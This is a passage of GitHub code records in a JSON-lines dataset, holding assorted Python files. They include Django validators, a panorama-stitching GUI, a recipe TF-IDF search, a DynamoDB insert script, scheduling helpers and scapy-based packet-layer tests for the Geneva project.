= np.array([50,10,12])\n\nprint(\"considering the matrix\\n\" + np.array2string(matrix))\nprint(\"at prices\", prices)\npayoff_one_unit = matrix @ prices\nprint(\"leads to payoff per units\", payoff_one_unit)\ntasks_to_cancel = payoff_one_unit < 0\nprint(\"leads to cancel at\", tasks_to_cancel)\n\nmatrix[tasks_to_cancel,] = 0\nprint(\"yeilds matrix\\n\" + np.array2string(matrix))\n","repo_name":"johannesmarti/pytrade","sub_path":"snipplets/cancel_tasks.py","file_name":"cancel_tasks.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30639329929","text":"from qgis.core import (QgsTask, QgsMessageLog, Qgis)\nfrom .createdbconnection import createDbConnection\n\nclass QueryTask(QgsTask):\n def __init__(self, connParams, queries):\n super().__init__('Suoritetaan laskentaa', QgsTask.CanCancel)\n self.exception = None\n self.conn = None\n self.queries = queries\n try:\n self.conn = createDbConnection(connParams)\n self.cur = self.conn.cursor()\n except Exception as e:\n self.exception = e\n\n def run(self):\n if self.exception:\n return False\n\n i = 0\n for query in self.queries:\n self.setProgress(i / len(self.queries) * 100)\n i += 1\n if self.isCanceled():\n self.exception = 'Laskenta keskeytetty'\n return False\n try:\n self.cur.execute(query)\n except Exception as e:\n self.exception = e\n self.conn.rollback()\n self.conn.close()\n return False\n self.conn.commit()\n self.conn.close()\n return True\n\n def finished(self, result):\n if not result:\n QgsMessageLog.logMessage('Laskentavirhe: ' + str(self.exception), 'YKRTool', Qgis.Critical)\n # raise self.exception\n self.cancel()\n","repo_name":"GispoCoding/assessclimateimpact","sub_path":"ykr_tool_tasks.py","file_name":"ykr_tool_tasks.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4055870343","text":"import re\n\n\ndef mobnum_Validation(form, model):\n data = form['mobile_number'].value()\n x = re.search(\"^((\\+){1}91){1}[1-9]{1}[0-9]{9}$\", str(data))\n if not x:\n return False\n\n\ndef mobnum_exist_Validation(form, model):\n data = form['mobile_number'].value()\n if model.objects.filter(mobile_number=data).exists():\n return False\n\n\ndef email_Validation(form, model):\n data = form['email'].value()\n x = re.search(\"^[a-zA-Z0-9+_.-]+@[a-zA-Z0-9.-]+$\", str(data))\n if not x:\n return False\n\n\ndef email_exist_Validation(form, model):\n data = form['email'].value()\n data = str(data)\n if model.objects.filter(email=data).exists():\n return False\n\n\ndef vehicleNum_Validation(form, model):\n data = form['vehicle_registration_no'].value()\n x = re.search(\"^[A-Z]{2}[ -][0-9]{1,2}(?: [A-Z])?(?: [A-Z]*)? [0-9]{4}$\", str(data)) ##############\"^[A-Z]{2}[0-9]{2}[A-Z]{2}[0-9]{4}$\n if not x:\n return False\n\ndef drivingLicNum_Validation(form, model):\n data = form['driving_lic_number'].value()\n if str(data) != \"\":\n x = re.search(\"^(([A-Z]{2}[0-9]{2})( )|([A-Z]{2}-[0-9]{2}))((19|20)[0-9][0-9])[0-9]{7}$\", str(data))\n if not x:\n return False\n\n\ndef RCBookNum_Validation(form, model):\n data = form['rc_book_no'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^[0-9]*$\", str(data))\n if not x:\n return False\n\ndef vehicleNum_exist_Validation(form, model):\n data = form['vehicle_registration_no'].value()\n if model.objects.filter(vehicle_registration_no=data).exists():\n return False\n\ndef drivingLicNum_exist__Validation(form, model):\n data = form['driving_lic_number'].value()\n if model.objects.filter(driving_lic_number=data).exists():\n return False\n\ndef RCBookNum_exist__Validation(form, model):\n data = form['rc_book_no'].value()\n if model.objects.filter(rc_book_no=data).exists():\n return False\n\n# def password_Validation(form, model):\n# data = form['password'].value()\n# x = re.search(\"(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[a-zA-Z])$\", str(data))\n# if not x:\n# return False\n\n\ndef password_exist_Validation(form, model):\n data = form['password'].value()\n if model.objects.filter(password=data).exists():\n return False\n\n\ndef age_Validation(form, model):\n data = form['age'].value()\n if str(data) != \"\" or not str(data).__contains__(\"Please enter age \"):\n if not len(data) <= 2 :\n return False\n\n\ndef name_Validation(form, model):\n data = form['name'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^[a-zA-Z]+$\", str(data))\n if not x:\n return False\n\n\ndef aadhar_Validation(form, model):\n data = form['aadhar_num'].value()\n print(data)\n if str(data) != \"\":\n x = re.search(\"^\\d{4}\\d{4}\\d{4}$\", str(data))\n if not x:\n # \"Please enter valid aadhar number\"\n return False\n\ndef soc_exist(form, model):\n data = form['name'].value()\n if model.objects.filter(name=data).exists():\n return False\n\ndef zone_exist(form, model):\n data = form['slot_name'].value()\n if model.objects.filter(slot_name=data).exists():\n return False\n\n\n","repo_name":"deegosai/parkingzone","sub_path":"ParkZone/AdminPanel_Validations.py","file_name":"AdminPanel_Validations.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12055198659","text":"from gefest.core.geometry.datastructs.structure import Structure\nfrom gefest.core.opt.objective.objective import Objective\nfrom gefest.core.utils import where\nfrom gefest.core.utils.parallel_manager import BaseParallelDispatcher\n\n\nclass ObjectivesEvaluator:\n \"\"\"Implements objecives evaluation procedure.\"\"\"\n\n def __init__(\n self,\n objectives: list[Objective],\n n_jobs=None,\n ) -> None:\n self.objectives = objectives\n if n_jobs in (0, 1):\n self._pm = None\n else:\n self._pm = BaseParallelDispatcher(n_jobs)\n\n def __call__(\n self,\n pop: list[Structure],\n **kwargs,\n ) -> list[Structure]:\n \"\"\"Calls objectives evaluation.\"\"\"\n return self.set_pop_objectives(pop=pop)\n\n def set_pop_objectives(\n self,\n pop: list[Structure],\n ) -> list[Structure]:\n \"\"\"Evaluates objectives for whole population.\"\"\"\n idxs_to_eval = where(pop, lambda ind: len(ind.fitness) == 0)\n individuals_to_eval = [pop[idx] for idx in idxs_to_eval]\n if self._pm:\n evaluated_individuals = self._pm.exec_parallel(\n func=self.eval_objectives,\n arguments=[(ind, self.objectives) for ind in individuals_to_eval],\n use=True,\n flatten=False,\n )\n for idx, evaluated_ind in zip(idxs_to_eval, evaluated_individuals):\n pop[idx] = evaluated_ind\n else:\n for idx in where(pop, lambda ind: len(ind.fitness) == 0):\n pop[idx] = self.eval_objectives(pop[idx], self.objectives)\n\n return sorted(pop, key=lambda x: x.fitness)\n\n def eval_objectives(self, ind: Structure, objectives) -> Structure:\n \"\"\"Evaluates objectives.\"\"\"\n ind.fitness = [obj(ind) for obj in objectives]\n return ind\n","repo_name":"aimclub/GEFEST","sub_path":"gefest/core/opt/objective/objective_eval.py","file_name":"objective_eval.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"12999743696","text":"import cv2\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport subprocess\r\nimport webbrowser\r\nimport sys\r\nfrom PIL import Image\r\nfrom matplotlib import pyplot as plt\r\nimport pano_conv\r\n# import time\r\n\r\nFILEBROWSER_PATH = 'nautilus'\r\nimput_img_folder = \"\"\r\ndone = 10101\r\n\r\nwindow = Tk()\r\nwindow.geometry('920x720')\r\nwindow.title(\"Pano Now\")\r\nwindow.config(bg=\"black\")\r\n\r\nLabel(window, text=\"Pano Now\", font=(\"Arial Bold\", 55), bg=\"black\", fg=\"#DDDDDD\").place(relx=0.5, rely=0.21, anchor=\"center\")\r\n\r\ndef close():\r\n sys.exit()\r\n\r\ndef pro():\r\n webbrowser.open('https://github.com/MJLNSN/Pano_convertor')\r\n\r\ndef imgfileselect():\r\n global imput_img_folder\r\n open_file = filedialog.askdirectory()\r\n imput_img_folder = open_file\r\n\r\nicon2 = PhotoImage(file='imp/folder.png')\r\nicon22 = icon2.subsample(9, 12)\r\nbt22 = Button(window, text=\" Select a Folder \", image=icon22, font=(\"Arial Bold\", 20), compound=LEFT, command=imgfileselect)\r\nbt22.place(relx=0.5, rely=0.50, anchor=\"center\")\r\n\r\nicon_close = PhotoImage(file='imp/close.png')\r\nicon_close2 = icon_close.subsample(9, 12)\r\nbt_close = Button(window, image=icon_close2, relief=FLAT, command=close, bg='black')\r\nbt_close.place(relx=0.9, rely=0.01)\r\n\r\nicon_help = PhotoImage(file='imp/help.png')\r\nicon_help2 = icon_help.subsample(9, 12)\r\nbt_help = Button(window, image=icon_help2, relief=FLAT, command=pro, bg='black')\r\nbt_help.place(relx=0.01, rely=0.01)\r\n\r\nlabell = Label(window, text=\"\", bg=\"black\")\r\n\r\ndef success(done):\r\n global imput_img_folder\r\n if done == 1:\r\n labell.configure(text=\"Successful! Please check the folder output!!!\", fg=\"green\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n labell.place(relx=0.5, rely=0.9, anchor=\"center\")\r\n window.update()\r\n labell.after(7000, lambda: labell.place_forget())\r\n elif done == 0:\r\n labell.configure(text=\"Process cannot be completed\", fg=\"red\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n labell.place(relx=0.5, rely=0.9, anchor=\"center\")\r\n\r\ndef output_open():\r\n outop = \"output\"\r\n subprocess.run([FILEBROWSER_PATH, outop])\r\n\r\ndef open_cv():\r\n global imput_img_folder\r\n global done\r\n global Images\r\n folder = imput_img_folder\r\n if imput_img_folder == \"\":\r\n labell.configure(text=\"Error: Plese select a folder which comtains several input images\", fg=\"red\", bg=\"#FCFFE7\", borderwidth=2, relief=\"raised\")\r\n return\r\n else:\r\n print(\"input images' location:\")\r\n print(imput_img_folder)\r\n labell.configure()\r\n\r\n path = imput_img_folder\r\n Images = []\r\n mylist = os.listdir(path)\r\n print(\"input images list:\")\r\n print(mylist)\r\n for imgn in mylist:\r\n curimg = cv2.imread(path + '/' + imgn)\r\n curimg = cv2.resize(curimg, (0, 0), None, 0.5, 0.5)\r\n Images.append(curimg)\r\n status, result = pano_conv.converter(Images)\r\n\r\n if status == 1:\r\n cv2.imwrite('output/pano_out.png', result)\r\n print(\"done\")\r\n done = 1\r\n plt.imshow(result)\r\n print(\"The panorama is saved in folder output!!!\")\r\n cv2.waitKey(1)\r\n else:\r\n print(\"Could not perform\")\r\n done = 0\r\n lb_done = Label(window, text=\"Could not perform\", font=(\"Arial Bold\", 15), bg=\"black\", fg=\"red\")\r\n lb_done.place(relx=0.5, rely=0.81, anchor=\"center\")\r\n success(done)\r\n cv2.waitKey(0)\r\n\r\nlabell.configure()\r\nlabell.pack(side=LEFT, ipadx=5, ipady=5)\r\n\r\nicon_start = PhotoImage(file='imp/pika.png')\r\nicon_start2 = icon_start.subsample(9, 12)\r\nbt21 = Button(window, text=\" Convert Now \", compound=LEFT, command=open_cv, fg=\"green\", font=(\"Arial Bold\", 25, \"bold\"))\r\nbt21.place(relx=0.5, rely=0.66, anchor=\"center\")\r\n\r\nicon_out = PhotoImage(file='imp/output.png')\r\nicon_out2 = icon_out.subsample(9, 12)\r\nbt211 = Button(window, image=icon_out2, compound=LEFT, text=\"Open Output Folder\", font=(\"Arial Bold\", 20), command=output_open)\r\nbt211.place(relx=0.5, rely=0.82, anchor=\"center\")\r\n\r\nwindow.mainloop()\r\n\r\n\r\n","repo_name":"MJLNSN/Panorama-Convertor-Image-Stitching","sub_path":"pano_now_with_gui.py","file_name":"pano_now_with_gui.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35670872709","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nx = []\nn = int(input())\nfor i in range(n):\n a, b = map(int, input().split())\n heapq.heappush(x, [b, a])\n\nfor i in range(n):\n t = heapq.heappop(x)\n print(t[1], t[0])\n\n#가장 빠르고 간결한 풀이\nfrom sys import stdin, stdout\n\nstdout.write(\n '\\n'.join(\n f'{v % 1000000 - 100000} {v // 1000000 - 100000}'\n for v\n in sorted(\n (int(line.split()[1])+100000) * 1000000\n + int(line.split()[0])+100000\n for line in stdin.read().splitlines()[1:]\n )\n ) + '\\n'\n)\n#두번째로 간결하고 빠른 풀이\nimport sys\ninput = sys.stdin.readline\ncoords = [input() for _ in range(int(input()))]\ncoords = sorted(coords, key = lambda coord: (int(coord.split()[1]), int(coord.split()[0])))\n\nprint(''.join(coords))","repo_name":"jjun-ni/jjun-ni","sub_path":"venv/정렬/11651.py","file_name":"11651.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"114538792","text":"import os\nfrom textblob import TextBlob\nimport string\nimport pandas as pd\nfrom nltk import word_tokenize, PorterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport login\n\n\ndef clean(data):\n cleaned_text = data.translate(str.maketrans('', '', string.punctuation + u'\\xa0'))\n cleaned_text = cleaned_text.lower().translate(str.maketrans(string.whitespace, ' ' * len(string.whitespace), ''))\n tokenized_text = word_tokenize(cleaned_text)\n stop_word = {s: 1 for s in stopwords.words()}\n remove_word = [word for word in tokenized_text if word not in stop_word]\n remove_word = [word for word in remove_word if len(word) > 2]\n ps = PorterStemmer()\n stemmed_word = ' '.join([ps.stem(w) for w in remove_word])\n return stemmed_word\n\n\ndef check_spell(query, query_type):\n query = 2\n check = TextBlob(query).correct()\n correct = str(check)\n print(correct)\n if query_type == 'title':\n query_by_title(correct)\n else:\n query_by_ingredients(correct)\n\n\ndataset = pd.read_csv('/Users/zhuhongjin/大三下/953481_IR/assignment/IR_TermProject2/asset/archive/recipe.csv')\ndataset = dataset.drop(['Unnamed: 0', 'Ingredients'], axis=1)\ndataset = dataset.dropna()\ndataset = dataset.reset_index(drop=True)\ncleaned_title = []\ncleaned_ingredients = []\n\nfor i in dataset['Title']:\n cleaned_title.append(clean(i))\n\nfor i in dataset['Cleaned_Ingredients']:\n cleaned_ingredients.append(clean(i))\n\n\ndef query_by_title(input):\n tfidfvectorizer = TfidfVectorizer(ngram_range=(1, 2))\n title_invert = tfidfvectorizer.fit_transform(cleaned_title)\n query = tfidfvectorizer.transform([clean(input)])\n result = cosine_similarity(title_invert, query).reshape((-1,))\n for i, index in enumerate(result.argsort()[-10:][::-1]):\n end_result = dataset['Title'][index]\n print(str(i + 1), dataset['Title'][index], \"--\", result[index], dataset['Image_Name'][index])\n return end_result\n\ndef query_by_ingredients(input):\n tfidfvectorizer = TfidfVectorizer(ngram_range=(1, 2))\n title_invert = tfidfvectorizer.fit_transform(cleaned_ingredients)\n query = tfidfvectorizer.transform([clean(input)])\n result = cosine_similarity(title_invert, query).reshape((-1,))\n for i, index in enumerate(result.argsort()[-10:][::-1]):\n print(str(i + 1), dataset['Title'][index], \"--\", result[index])\n\n\nif __name__ == '__main__':\n # login.app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', 3569)))\n check_spell('mushro', 'title')\n check_spell('sugar', 'ingredients')\n","repo_name":"Cosmos-52/IR_TermProject2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34107565867","text":"import os\r\nimport pypandoc\r\nfrom django.conf import settings\r\nfrom django.http import FileResponse\r\nfrom django.shortcuts import render\r\nfrom .models import Files\r\n\r\ndef save_and_convert(request):\r\n if request.method == \"POST\":\r\n # Get the uploaded file from the request\r\n uploaded_file = request.FILES['document']\r\n\r\n # Save the original file to the media directory\r\n file_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name)\r\n with open(file_path, 'wb') as f:\r\n f.write(uploaded_file.read())\r\n\r\n # Convert the file to HTML using pypandoc\r\n html_output = pypandoc.convert_file(file_path, 'html', format='docx')\r\n\r\n # Save the HTML output to the media directory\r\n html_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name + '.html')\r\n with open(html_path, 'w', encoding='utf-8') as f:\r\n f.write(html_output)\r\n\r\n # Create a FileResponse object containing the HTML file\r\n download_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name + '.html')\r\n download_name = uploaded_file.name + '.html'\r\n response = FileResponse(open(download_path, 'rb'))\r\n response['content_type'] = 'application/octet-stream'\r\n response['Content-Disposition'] = 'attachment; filename=%s' % download_name\r\n\r\n return response\r\n \r\n return render(request, 'save_and_convert.html')\r\n","repo_name":"MarvelousAnkit/DJANGO-DOC-TO-HTML-CONVERTER","sub_path":"conversion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21487414660","text":"import boto3\nfrom pprint import pprint\n\n\ndef put_user(name, occupation, hobby, dynamodb=None):\n if not dynamodb:\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n\n table = dynamodb.Table('Users')\n response = table.put_item(\n Item={\n 'name': name,\n 'occupation': occupation,\n 'hobby': hobby\n }\n )\n return response\n\n\nif __name__ == '__main__':\n user_resp = put_user(\"Thamires\", \"Student\", \"games\")\n print(\"Put user succeeded:\")\n pprint(user_resp, sort_dicts=False)\n","repo_name":"Thamires-Lopes/Hands-on-DynamoDB","sub_path":"CreateItem.py","file_name":"CreateItem.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70742580649","text":"from django.utils import timezone\n\nfrom lesson.utils import get_date_time_from_datetime_timezone\n\n\ndef get_end_time_lesson(begin_time):\n \"\"\"Return end_time for a lesson, calculating from begin_time\n :type begin_time: string, format HH:MM\n :return : string, format HH:MM\"\"\"\n hour, minutes = begin_time.split(':')\n dt = timezone.datetime(2020, 1, 1, int(hour), int(minutes), 0) + timezone.timedelta(minutes=30)\n return dt.strftime('%H:%M')\n\n\ndef compose_schedule_data(orig_data, lessons_qs, time_zone, this_date_str):\n res_data = {'available': []}\n if orig_data:\n # first, order received schedule data\n av_list = sorted(orig_data, key=lambda item: item.get('beginTime'))\n else:\n av_list = []\n res_data['lessons'] = []\n for item in lessons_qs.all():\n date_str, time_str = get_date_time_from_datetime_timezone(item.get('scheduled_datetime'), time_zone)\n if date_str != this_date_str:\n continue\n else:\n res_data['lessons'].append({'id': item.get('id'), 'time': time_str})\n lesson_ind = 0\n qty_lesson = len(res_data['lessons'])\n for item in av_list:\n begin_time = item.get('beginTime')\n end_time = item.get('endTime')\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n else:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n continue\n\n # walk on lessons until reach one with some hour coincidence; case 1 in documentation\n while lesson_ind < qty_lesson and lesson_end_time <= begin_time:\n lesson_ind += 1\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n if lesson_ind == qty_lesson:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n continue\n\n # Here, there is some lesson to analyze\n # cases where lesson ends before availability end; cases 2, 3, 4 in documentation\n while lesson_ind < qty_lesson and lesson_end_time < end_time:\n if lesson_begin_time > begin_time: # case 4 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': lesson_begin_time})\n begin_time = lesson_end_time\n lesson_ind += 1\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n\n if lesson_ind < qty_lesson:\n if lesson_end_time == end_time and lesson_begin_time <= begin_time: # case 9 in documentation\n lesson_ind += 1 # get begin, end times of lesson is made at cycle beginning\n elif lesson_end_time > end_time and lesson_begin_time <= begin_time: # case 8 in documentation\n pass\n elif lesson_begin_time < end_time: # cases 5, 6 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': lesson_begin_time})\n if lesson_end_time == end_time: # case 5 in documentation\n lesson_ind += 1 # get begin, end times of lesson is made at cycle beginning\n else: # case 7 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n else:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n return res_data\n","repo_name":"iamvane/nabi_api_django","sub_path":"schedule/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32546951538","text":"import pytest\n\nimport actions.utils\nimport actions.trigger\nimport layers.packet\nimport layers.layer\nimport layers.tcp_layer\nimport layers.dns_layer\nimport layers.dnsqr_layer\nimport layers.udp_layer\nimport layers.ip_layer\nimport evolve\n\nfrom scapy.all import IP, TCP, UDP, DNS, DNSQR, Raw, DNSRR\n\n\ndef test_parse_layers():\n \"\"\"\n Tests layer parsing.\n \"\"\"\n pkt = IP()/TCP()/Raw(\"\")\n packet = layers.packet.Packet(pkt)\n layers_l = list(packet.read_layers())\n assert layers_l[0].name == \"IP\"\n assert layers_l[1].name == \"TCP\"\n\n layers_dict = packet.setup_layers()\n assert layers_dict[\"IP\"]\n assert layers_dict[\"TCP\"]\n\n\ndef test_get_random():\n \"\"\"\n Tests get random\n \"\"\"\n\n tcplayer = layers.tcp_layer.TCPLayer(TCP())\n field, value = tcplayer.get_random()\n assert field in layers.tcp_layer.TCPLayer.fields\n\n\ndef test_gen_random():\n \"\"\"\n Tests gen random\n \"\"\"\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer in [DNS, TCP, UDP, IP, DNSQR]\n\n\ndef test_dnsqr():\n \"\"\"\n Tests DNSQR.\n \"\"\"\n pkt = UDP()/DNS(ancount=1)/DNSQR()\n pkt.show()\n packet = layers.packet.Packet(pkt)\n packet.show()\n assert len(packet.layers) == 3\n assert \"UDP\" in packet.layers\n assert \"DNS\" in packet.layers\n assert \"DNSQR\" in packet.layers\n pkt = IP()/UDP()/DNS()/DNSQR()\n packet = layers.packet.Packet(pkt)\n assert str(packet)\n\n\ndef test_load():\n \"\"\"\n Tests loads.\n \"\"\"\n tcp = layers.tcp_layer.TCPLayer(TCP())\n load = tcp.gen(\"load\")\n pkt = IP()/\"datadata\"\n p = layers.packet.Packet(pkt)\n assert p.get(\"IP\", \"load\") == \"datadata\"\n p2 = layers.packet.Packet(IP(bytes(p)))\n assert p2.get(\"IP\", \"load\") == \"datadata\"\n p2.set(\"IP\", \"load\", \"data2\")\n # Check p is unchanged\n assert p.get(\"IP\", \"load\") == \"datadata\"\n assert p2.get(\"IP\", \"load\") == \"data2\"\n p2.show2()\n # Check that we can dump\n assert p2.show2(dump=True)\n # Check that we can dump\n assert p2.show(dump=True)\n assert p2.get(\"IP\", \"chksum\") == None\n\n pkt = IP()/TCP()/\"datadata\"\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"load\") == \"datadata\"\n p2 = layers.packet.Packet(IP(bytes(p)))\n assert p2.get(\"TCP\", \"load\") == \"datadata\"\n p2.set(\"TCP\", \"load\", \"data2\")\n # Check p is unchanged\n assert p.get(\"TCP\", \"load\") == \"datadata\"\n assert p2.get(\"TCP\", \"load\") == \"data2\"\n p2.show2()\n assert p2.get(\"IP\", \"chksum\") == None\n\n\ndef test_parse_load(logger):\n \"\"\"\n Tests load parsing.\n \"\"\"\n pkt = layers.packet.Packet(IP()/TCP()/\"TYPE A\\r\\n\")\n print(\"Parsed: %s\" % pkt.get(\"TCP\", \"load\"))\n\n strat = actions.utils.parse(\"[TCP:load:TYPE%20A%0D%0A]-drop-| \\/\", logger)\n results = strat.act_on_packet(pkt, logger)\n assert not results\n\n value = pkt.gen(\"TCP\", \"load\") + \" \" + pkt.gen(\"TCP\", \"load\")\n pkt.set(\"TCP\", \"load\", value)\n assert \" \" not in pkt.get(\"TCP\", \"load\"), \"%s contained a space!\" % pkt.get(\"TCP\", \"load\")\n\n\ndef test_dns():\n \"\"\"\n Tests DNS layer.\n \"\"\"\n dns = layers.dns_layer.DNSLayer(DNS())\n print(dns.gen(\"id\"))\n assert dns.gen(\"id\")\n\n p = layers.packet.Packet(DNS(id=0xabcd))\n p2 = layers.packet.Packet(DNS(bytes(p)))\n assert p.get(\"DNS\", \"id\") == 0xabcd\n assert p2.get(\"DNS\", \"id\") == 0xabcd\n\n p2.set(\"DNS\", \"id\", 0x4321)\n assert p.get(\"DNS\", \"id\") == 0xabcd # Check p is unchanged\n assert p2.get(\"DNS\", \"id\") == 0x4321\n\n dns = layers.packet.Packet(DNS(aa=1))\n assert dns.get(\"DNS\", \"aa\") == 1\n aa = dns.gen(\"DNS\", \"aa\")\n assert aa == 0 or aa == 1\n assert dns.get(\"DNS\", \"aa\") == 1 # Original value unchanged\n\n dns = layers.packet.Packet(DNS(opcode=15))\n assert dns.get(\"DNS\", \"opcode\") == 15\n opcode = dns.gen(\"DNS\", \"opcode\")\n assert opcode >= 0 and opcode <= 15\n assert dns.get(\"DNS\", \"opcode\") == 15 # Original value unchanged\n\n dns.set(\"DNS\", \"opcode\", 3)\n assert dns.get(\"DNS\", \"opcode\") == 3\n\n dns = layers.packet.Packet(DNS(qr=0))\n assert dns.get(\"DNS\", \"qr\") == 0\n qr = dns.gen(\"DNS\", \"qr\")\n assert qr == 0 or qr == 1\n assert dns.get(\"DNS\", \"qr\") == 0 # Original value unchanged\n\n dns.set(\"DNS\", \"qr\", 1)\n assert dns.get(\"DNS\", \"qr\") == 1\n\n dns = layers.packet.Packet(DNS(arcount=0xAABB))\n assert dns.get(\"DNS\", \"arcount\") == 0xAABB\n arcount = dns.gen(\"DNS\", \"arcount\")\n assert arcount >= 0 and arcount <= 0xffff\n assert dns.get(\"DNS\", \"arcount\") == 0xAABB # Original value unchanged\n\n dns.set(\"DNS\", \"arcount\", 65432)\n assert dns.get(\"DNS\", \"arcount\") == 65432\n\n dns = layers.dns_layer.DNSLayer(DNS()/DNSQR(qname=\"example.com\"))\n assert isinstance(dns.get_next_layer(), DNSQR)\n print(dns.gen(\"id\"))\n assert dns.gen(\"id\")\n\n p = layers.packet.Packet(DNS(id=0xabcd))\n p2 = layers.packet.Packet(DNS(bytes(p)))\n assert p.get(\"DNS\", \"id\") == 0xabcd\n assert p2.get(\"DNS\", \"id\") == 0xabcd\n\n\ndef test_read_layers():\n \"\"\"\n Tests the ability to read each layer\n \"\"\"\n packet = IP() / UDP() / TCP() / DNS() / DNSQR(qname=\"example.com\") / DNSQR(qname=\"example2.com\") / DNSQR(qname=\"example3.com\")\n packet_geneva = layers.packet.Packet(packet)\n packet_geneva.setup_layers()\n\n i = 0\n for layer in packet_geneva.read_layers():\n if i == 0:\n assert isinstance(layer, layers.ip_layer.IPLayer)\n elif i == 1:\n assert isinstance(layer, layers.udp_layer.UDPLayer)\n elif i == 2:\n assert isinstance(layer, layers.tcp_layer.TCPLayer)\n elif i == 3:\n assert isinstance(layer, layers.dns_layer.DNSLayer)\n elif i == 4:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example.com\"\n elif i == 5:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example2.com\"\n elif i == 6:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example3.com\"\n i += 1\n\ndef test_multi_opts():\n \"\"\"\n Tests various option getting/setting.\n \"\"\"\n pkt = IP()/TCP(options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (4154603075, 0)), ('NOP', None), ('WScale', 7), ('md5header', b'abcd' * 8)])\n packet = layers.packet.Packet(pkt)\n assert packet.get(\"TCP\", \"options-sackok\") == ''\n assert packet.get(\"TCP\", \"options-mss\") == 1460\n assert packet.get(\"TCP\", \"options-timestamp\") == 4154603075\n assert packet.get(\"TCP\", \"options-wscale\") == 7\n packet.set(\"TCP\", \"options-timestamp\", 400000000)\n assert packet.get(\"TCP\", \"options-sackok\") == ''\n assert packet.get(\"TCP\", \"options-mss\") == 1460\n assert packet.get(\"TCP\", \"options-timestamp\") == 400000000\n assert packet.get(\"TCP\", \"options-wscale\") == 7\n pkt = IP()/TCP(options=[('SAckOK', b''), ('Timestamp', (4154603075, 0)), ('NOP', None), ('WScale', 7)])\n packet = layers.packet.Packet(pkt)\n # If the option isn't present, it will be returned as an empty string\n assert packet.get(\"TCP\", \"options-mss\") == ''\n packet.set(\"TCP\", \"options-mss\", \"\")\n assert packet.get(\"TCP\", \"options-mss\") == 0\n\n\ndef test_options_eol():\n \"\"\"\n Tests options-eol.\n \"\"\"\n pkt = TCP(options=[(\"EOL\", None)])\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"options-eol\") == \"\"\n p2 = layers.packet.Packet(TCP(bytes(p)))\n assert p2.get(\"TCP\", \"options-eol\") == \"\"\n p = layers.packet.Packet(IP()/TCP(options=[]))\n assert p.get(\"TCP\", \"options-eol\") == \"\"\n p.set(\"TCP\", \"options-eol\", \"\")\n p.show()\n assert len(p[\"TCP\"].options) == 1\n assert any(k == \"EOL\" for k, v in p[\"TCP\"].options)\n value = p.gen(\"TCP\", \"options-eol\")\n assert value == \"\", \"eol cannot store data\"\n p.set(\"TCP\", \"options-eol\", value)\n p2 = TCP(bytes(p))\n assert any(k == \"EOL\" for k, v in p2[\"TCP\"].options)\n\n\ndef test_compression_fallback(logger):\n \"\"\"\n Test that compression does not touch a packet without DNS in it packet\n \"\"\"\n pkt = UDP()\n p = layers.packet.Packet(pkt)\n p2 = 